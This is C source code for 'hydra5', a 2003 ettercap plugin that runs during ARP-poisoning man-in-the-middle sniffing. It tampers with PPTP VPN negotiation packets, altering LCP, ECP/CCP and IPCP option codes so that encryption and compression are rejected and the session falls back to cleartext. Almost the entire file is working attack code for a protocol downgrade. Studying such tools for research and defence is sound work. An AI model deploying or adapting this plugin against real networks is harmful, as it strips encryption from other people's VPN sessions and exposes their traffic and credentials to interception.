/*
    hydra5 -- ettercap plugin -- Tries to force PPTP cleartext connections

    Copyright (C) 2003  ALoR <alor@users.sourceforge.net>, NaGA <crwm@freemail.it>
    
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

    $Id: H07_hydra5.c,v 1.1 2003/01/22 14:20:44 lordnaga Exp $
*/

#include <stdlib.h>

#ifndef CYGWIN
#include <unistd.h>
#endif

#include <sys/types.h>
#include <stdio.h>
#include <string.h>

#include "../../src/include/ec_main.h"
#include "../../src/include/ec_version.h"
#include "../../src/include/ec_plugins.h"
#include "../../src/include/ec_inet_structures.h"
#include "../../src/include/ec_inet.h"

// protos....

int Plugin_Init(void *);
int Plugin_Fini(void *);
int hydra5(void *buffer);

// plugin operation

struct plugin_ops hydra5_ops = {
   ettercap_version: VERSION,
   plug_info:        "PPTP: Tries to force cleartext",
   plug_version:     10,
   plug_type:        PT_HOOK,
   hook_point:       PCK_RECEIVED_RAW,
   hook_function:    &hydra5,
};


struct pptp_gre_header {
	u_char flags;		
	u_char ver;		
	u_short protocol;	
	u_short payload_len;	
	u_short call_id;	
	u_int32_t seq;		
	u_int32_t ack;		
};

#define PPTP_GRE_PROTO	0x880B
#define PPTP_GRE_VER	0x1

#define PPTP_GRE_IS_C(f) ((f) & 0x80)
#define PPTP_GRE_IS_R(f) ((f) & 0x40)
#define PPTP_GRE_IS_K(f) ((f) & 0x20)
#define PPTP_GRE_IS_S(f) ((f) & 0x10)
#define PPTP_GRE_IS_A(f) ((f) & 0x80)


struct ppp_header {
	u_char address;
	u_char control;
	u_short proto;
};

struct ppp_lcp_header {
	u_char code;
	u_char ident;
	u_short length;
};

#define PPP_PROTO_ECP		0x8053
#define PPP_PROTO_CCP		0x80fd		
#define PPP_PROTO_LCP		0xc021
#define PPP_PROTO_IPCP		0x8021

#define PPP_CONFIGURE_REQUEST   0x01
#define PPP_CONFIGURE_REJ   	0x04

#define PPP_REQUEST_FCOMP	0x07
#define PPP_REQUEST_ACOMP	0x08
#define PPP_REQUEST_VJC		0x02

#define PPP_REQUEST_DUMMY1	0xe7
#define PPP_REQUEST_DUMMY2	0x7e

#define PPP_OBFUSCATE		0x30

int sock; 

//==================================

int Plugin_Init(void *params)
{
   return Plugin_Register(params, &hydra5_ops);
}

int Plugin_Fini(void *params)
{
   return 0;
}


// =================================

char *Parse_Option(char * buffer, char option, short tot_len)
{
    char counter=0;
    while (tot_len>0 && *buffer!=option && counter<50)
    {	
	tot_len-=buffer[1];
	buffer+=buffer[1];
	counter++;
    }
    if (*buffer==option) return buffer;
    return NULL;
}

void Obfuscate_Options(u_char * buffer, short tot_len)
{
    char counter=0;
    while (tot_len>0 && counter<50)
    {
	if (buffer[0]>0 && buffer[0]!=0xff) 
	    buffer[0]+=PPP_OBFUSCATE;
		
	tot_len-=buffer[1];
	buffer+=buffer[1];

	counter++;
    }
}

void Clear_Options(u_char * buffer, short tot_len)
{
    char counter=0;
    while (tot_len>0 && counter<50)
    {	
	if (buffer[0]>PPP_OBFUSCATE && buffer[0]!=0xff) 
	    buffer[0]-=PPP_OBFUSCATE;

	tot_len-=buffer[1];
	buffer+=buffer[1];

	counter++;
    }
}

int hydra5(void *buffer)              
{                                    
   IP_header  *ip;
   ETH_header *eth;
   RAW_PACKET *pck_raw;
   struct pptp_gre_header *pgh;
   struct ppp_header *ppp;
   struct ppp_lcp_header *lcp;
   u_short proto;
   unsigned int pghlen;
   static int flag=0;
   u_char *option;
   
   pck_raw = (RAW_PACKET *)buffer;

   eth = (ETH_header *) pck_raw->buffer;
   
   if (!Options.arpsniff && !flag)
   {
      Plugin_Hook_Output("You have to use arpsniff to summon hydra5...\n");
      flag=1;
   }
   
   if ( ntohs(eth->type) == ETH_P_IP && Options.arpsniff )
   {
      ip = (IP_header *)(eth+1);
      if (ip->proto != IPPROTO_GRE) return (0);
      
      if (ntohs(ip->t_len) < (pghlen = sizeof(*pgh)) +  IP_HEADER)
	return (0);
		
      pgh = (struct pptp_gre_header *)((int)ip + ip->h_len * 4);
	
      if ((pgh->ver & 0x7f) != PPTP_GRE_VER ||
	   ntohs(pgh->protocol) != PPTP_GRE_PROTO ||
	   PPTP_GRE_IS_C(pgh->flags) || PPTP_GRE_IS_R(pgh->flags) ||
	   PPTP_GRE_IS_K(pgh->flags) == 0 || (pgh->flags & 0xf) != 0) 
		return (0);
	
      if (PPTP_GRE_IS_S(pgh->flags) == 0) return (0);
	
      if (PPTP_GRE_IS_A(pgh->ver) == 0) pghlen -= sizeof(pgh->ack);

      if (ntohs(ip->t_len) < ntohs(pgh->payload_len) + pghlen + IP_HEADER)
		return (0);

      ppp = (struct ppp_header *)((unsigned int)pgh + pghlen); 
      
      if (ppp->address != 0xff && ppp->control != 0x3) 
      {
		proto = ntohs(*((short *)ppp));
		lcp = (struct ppp_lcp_header *)((u_char *)ppp + sizeof(proto));
      }
      else 
      {
	    proto = ntohs(ppp->proto);
	    lcp = (struct ppp_lcp_header *)(ppp + 1);
      }
      
      if (proto == PPP_PROTO_LCP)
      { 
          // Clear Header Compression
          if ( lcp->code == PPP_CONFIGURE_REQUEST)
          {
              if ( (option=Parse_Option( (char *)(lcp + 1), PPP_REQUEST_FCOMP, ntohs(lcp->length)-sizeof(*lcp))) !=NULL)       
                  option[0]=PPP_REQUEST_DUMMY1;      
      
              if ( (option=Parse_Option( (char *)(lcp + 1), PPP_REQUEST_ACOMP, ntohs(lcp->length)-sizeof(*lcp))) !=NULL)       
                  option[0]=PPP_REQUEST_DUMMY2;      
          }

          if ( lcp->code == PPP_CONFIGURE_REJ)
          {
              if ( (option=Parse_Option( (char *)(lcp + 1), PPP_REQUEST_DUMMY1, ntohs(lcp->length)-sizeof(*lcp))) !=NULL)       
                  option[0]=PPP_REQUEST_FCOMP;      
      
              if ( (option=Parse_Option( (char *)(lcp + 1), PPP_REQUEST_DUMMY2, ntohs(lcp->length)-sizeof(*lcp))) !=NULL)       
                  option[0]=PPP_REQUEST_ACOMP;      
          }
      }
      else if (proto == PPP_PROTO_ECP || proto == PPP_PROTO_CCP)
      {
          // Clear ECP and CCP
          if ( lcp->code == PPP_CONFIGURE_REQUEST)
              Obfuscate_Options((u_char *)(lcp + 1), ntohs(lcp->length)-sizeof(*lcp));
	  
	  if ( lcp->code == PPP_CONFIGURE_REJ)
	      Clear_Options((u_char *)(lcp + 1), ntohs(lcp->length)-sizeof(*lcp));
      }
      else if (proto == PPP_PROTO_IPCP)
      {
          // Clear Van Jacobson compression
          if ( lcp->code == PPP_CONFIGURE_REQUEST)
          {
              if ( (option=Parse_Option( (char *)(lcp + 1), PPP_REQUEST_VJC, ntohs(lcp->length)-sizeof(*lcp))) !=NULL)       
                  option[0]=PPP_REQUEST_DUMMY1;      
          }

          if ( lcp->code == PPP_CONFIGURE_REJ)
          {
              if ( (option=Parse_Option( (char *)(lcp + 1), PPP_REQUEST_DUMMY1, ntohs(lcp->length)-sizeof(*lcp))) !=NULL)       
                  option[0]=PPP_REQUEST_VJC;      
          }
      }
   }

   return 0;
}


/* EOF */
